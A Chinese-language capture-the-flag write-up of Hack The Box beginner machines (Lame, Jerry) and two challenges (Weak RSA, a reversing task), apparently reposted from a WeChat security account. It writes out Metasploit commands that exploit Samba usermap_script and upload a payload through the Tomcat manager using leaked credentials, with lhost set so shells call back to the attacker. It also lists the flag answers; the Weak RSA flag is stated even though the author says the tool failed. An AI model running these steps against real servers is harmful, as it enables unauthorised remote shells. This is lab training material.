Lame
端口扫描,nmap -sV -sS -A 10.10.10.3
发现对方开放21、22、139、445端口。通常445端口是需要关闭的,且开启了netbios-ssn服务,可知NETBIOS是和TCP/IP捆绑在一起的。当NETBIOS运行时,你的后门打开了,因为NETBIOS不光允许局域网内的用户访问你的硬盘资源,internet上的黑客也能进入。比如之前的永恒之蓝漏洞就是通过445端口利用的。所以可以使用msf去漏洞利用。
Msf打开后输入
search samba 3.0.20
搜索samba 3.0.20版本可利用的exploit
发现有一个可利用的exp,接着输入:
use exploit/multi/samba/usermap_script //使用此exp
set rhosts 10.10.10.3 //设置目标IP为10.10.10.3
set lhost 10.10.14.4 //设置本机IP地址为10.10.14.4
options //检查配置是否有遗漏,没有遗漏即可开始攻击
exploit //漏洞利用
漏洞利用成功!当前是root用户,我们可以升级下shell为TTY
SHELL=/bin/bash script -q /dev/null
然后去搜寻flag,最后在用户根目录下找到了root.txt,然后cat一下拿到flag
然后接着我们要寻找用户flag(这个靶场一个题目是有两个flag的,一个是user flag,一个是root flag),我们在home目录寻找
找到user flag,本节完成!
Find The Easy Pass
本题是CTF中的reverse题,下载文件做题。
打开OD,智能搜索
有个fortran!,检查一遍
密码正确,然后flag就是HTB { fortran!}
Weak RSA
密码学题,解压发现两个文件:flag.enc和key.pub
题目是weak,说明是弱公钥分解,我们可以使用RsaCtf工具进行破解
git clone https://github.com/Ganapati/RsaCtfTool.git
sudo apt-get install libgmp3-dev libmpc-dev
cd RsaCtfTool
pip3 install -r "requirements.txt"
然后使用
python RsaCtfTool.py –-publickey key.pub –-uncipherfile flag.enc
狗日的今日运气不好工具解不出来,跳过
HTB {s1mpl3_Wi3n3rs_4tt4ck}
Jerry
扫描端口:nmap -sV -sS -A 10.10.10.95
可以发现开放8080端口,apache tomcat解析容器。我们通过浏览器访问8080端口
是个tomcat的默认页面,点击manager app可以看到有个登录窗口
我们可以使用tomcat的默认账号密码,也可以使用admin,admin这种看看是否可以登录
输入admin/admin后发现是个403页面,仔细一看,可以看到泄露了账号密码,tomcat/s3cret。清除cookie后重新使用tomcat/s3cret登录。
登录成功,显示页面配置信息
向下翻滚,我们突然看到有个文件上传war包的地方,我想这是个可以利用的漏洞点
我们可以使用msfvenom生成一个war木马上传。不过我没找到webshell,我们也可以使用msf的一个tomcat文件上传的模块进行上传。
use exploit/multi/http/tomcat_mgr_upload
show options //我们先看看需要设置什么东西
set HttpPassword s3cret //设置登录密码
set HttpUsername tomcat //设置登录账号
set rhosts 10.10.10.95 //设置目标ip地址
set rport 8080 //设置目标端口
set lhost 10.10.14.4 //设置本机kali的ip地址
exploit //漏洞利用
攻击成功,获得shell。然后搜寻flag,管理员用户的桌面上发现flags目录,里面有个2 for the price of 1.txt
Type “2 for the price of 1.txt”
Flag到手
后面还有几题不想写了,累了!!
备注:欢迎加入我们暗魂安全团队,投简历至[email protected],最快当天技术面试。
我们有hackthebox靶场的VIP会员,享受专用靶场练习
本文始发于微信公众号(暗魂攻防实验室):【渗透测试】Hackthebox之Beginner Track系列
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论